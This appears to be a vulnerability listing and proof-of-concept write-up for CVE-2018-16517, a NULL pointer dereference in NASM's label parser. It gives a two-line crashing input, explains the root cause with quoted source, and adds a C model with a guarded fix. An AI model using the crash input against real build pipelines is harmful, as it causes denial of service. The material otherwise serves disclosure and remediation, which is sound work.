| Title | Published | Views | Family |
|---|---|---|---|
| Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference Exploit | 18 Apr 2019 00:00 | – | zdt |
| Netwide Assembler Null Pointer Dereference Vulnerability | 7 Sep 2018 00:00 | – | cnvd |
| CVE-2018-16517 | 6 Sep 2018 23:00 | – | cve |
| CVE-2018-16517 | 6 Sep 2018 23:00 | – | cvelist |
| CVE-2018-16517 | 6 Sep 2018 23:00 | – | debiancve |
| Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC) | 18 Apr 2019 00:00 | – | exploitdb |
| EUVD-2018-8326 | 7 Oct 2025 00:30 | – | euvd |
| Updated nasm packages fix security vulnerability | 31 Jul 2020 23:25 | – | mageia |
| CVE-2018-16517 | 6 Sep 2018 23:29 | – | nvd |
| openSUSE Security Update : nasm (openSUSE-2020-952) | 20 Jul 2020 00:00 | – | nessus |
# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)
# Date: 2018-09-05
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: https://www.nasm.us/
# Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
# Version: 2.14rc15 and earlier
# Tested on: 2.14rc15
# CVE : CVE-2018-16517
asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file.
PoC:
1. echo "equ push rax" > poc
2. nasm -f elf poc
When the first token on the line is EQU itself, it scans as TOKEN_INSN rather than TOKEN_ID, and insn_is_label is still false, so the label branch below is not taken and result->label is never assigned. It stays NULL, and when the EQU is processed that NULL pointer reaches islocal() in asm/labels.c, which reads l[0] without a NULL check. The result is a crash (denial of service) on the two-word input above, with no memory corruption beyond the invalid read.
[...]
    if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) {   <-- not taken
        /* there's a label here */
        first = false;
        result->label = tokval.t_charptr;
        i = stdscan(NULL, &tokval);
        if (i == ':') { /* skip over the optional colon */
            i = stdscan(NULL, &tokval);
        } else if (i == 0) {
            nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1,
                       "label alone on a line without a colon might be in error");
        }
        if (i != TOKEN_INSN || tokval.t_integer != I_EQU) {
            /*
             * FIXME: location.segment could be NO_SEG, in which case
             * it is possible we should be passing 'absolute.segment'. Look into this.
             * Work out whether that is *really* what we should be doing.
             * Generally fix things. I think this is right as it is, but
             * am still not certain.
             */
            define_label(result->label,
                         in_absolute ? absolute.segment : location.segment,
                         location.offset, true);
[...]
static bool islocal(const char *l)
{
    if (tasm_compatible_mode) {
        if (l[0] == '@' && l[1] == '@')
            return true;
    }
    return (l[0] == '.' && l[1] != '.');   <-- boom
}
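The following is an added example, not NASM's code: a stand-alone C model of the label branch quoted above, with the body of islocal() reproduced next to a guarded variant and a line classifier that rejects an EQU with no preceding label instead of handing a NULL pointer to islocal(). The mnemonic table, next_token(), leading_label(), check_line() and the error text are assumptions made for illustration; NASM's real parser uses its full instruction table and stdscan(), and the sample lines (the first is the PoC) are constructed here.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Toy stand-in for NASM's TOKEN_INSN lookup (assumption, not NASM's table). */
static const char *const mnemonics[] = { "equ", "push", "pop", "mov", "dec", "ret", NULL };

/* Case-insensitive equality, since mnemonics are case-insensitive. */
static bool ieq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return false;
    return *a == *b;
}

static bool is_mnemonic(const char *tok)
{
    for (const char *const *m = mnemonics; *m; m++)
        if (ieq(tok, *m))
            return true;
    return false;
}

/* islocal() as quoted from asm/labels.c: l is dereferenced unconditionally,
 * so a NULL result->label crashes on l[0]. */
static bool islocal_unchecked(const char *l, bool tasm_compatible_mode)
{
    if (tasm_compatible_mode) {
        if (l[0] == '@' && l[1] == '@')
            return true;
    }
    return (l[0] == '.' && l[1] != '.');
}

/* Guarded variant: a missing label is never a local label. */
static bool islocal_checked(const char *l, bool tasm_compatible_mode)
{
    if (l == NULL)
        return false;
    return islocal_unchecked(l, tasm_compatible_mode);
}

/* Copy the next identifier-like token into out; return the position after it. */
static const char *next_token(const char *p, char *out, size_t outsz)
{
    size_t n = 0;
    while (*p == ' ' || *p == '\t')
        p++;
    while (*p && (isalnum((unsigned char)*p) || strchr("._?$@~#", *p))) {
        if (n + 1 < outsz)
            out[n++] = *p;
        p++;
    }
    out[n] = '\0';
    return p;
}

/* Mirror the quoted branch: the first token is a label if it is a plain identifier
 * or is followed by ':'. A bare mnemonic such as "equ" is an instruction token, so
 * no label is recorded (out is left empty, i.e. result->label stays NULL). */
static const char *leading_label(const char *line, char *out, size_t outsz)
{
    const char *p = next_token(line, out, outsz);
    if (out[0] == '\0')
        return line;
    if (*p == ':')
        return p + 1;
    if (is_mnemonic(out)) {
        out[0] = '\0';
        return line;
    }
    return p;
}

/* Classify one source line the way a hardened parser should:
 *  -1  EQU with no preceding label (rejected instead of reaching islocal() with NULL)
 *   0  nothing to define,  1  global label defined,  2  local label defined */
static int check_line(const char *line, bool tasm)
{
    char label[64], insn[64];
    const char *rest = leading_label(line, label, sizeof label);
    next_token(rest, insn, sizeof insn);
    const char *lab = label[0] ? label : NULL;   /* NULL on the PoC line */

    if (ieq(insn, "equ") && lab == NULL)
        return -1;                /* the check the PoC line bypasses in 2.14rc15 */
    if (lab == NULL)
        return 0;
    return islocal_checked(lab, tasm) ? 2 : 1;
}

int main(void)
{
    /* Constructed sample lines; the first is the advisory's PoC. */
    const char *lines[] = { "equ push rax", "foo equ 1", ".loop: dec rcx", "push rax" };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        int r = check_line(lines[i], false);
        printf("%-16s -> %s\n", lines[i],
               r < 0 ? "error: EQU not preceded by label" :
               r == 0 ? "no label" : r == 1 ? "global label" : "local label");
    }
    return 0;
}
```

The model keeps the two observable facts from the write-up: an EQU in first position never produces a label, and islocal() trusts its argument. A fix can live at either point; rejecting the line before define_label() is the cheaper one because it also gives the user a diagnostic instead of a crash.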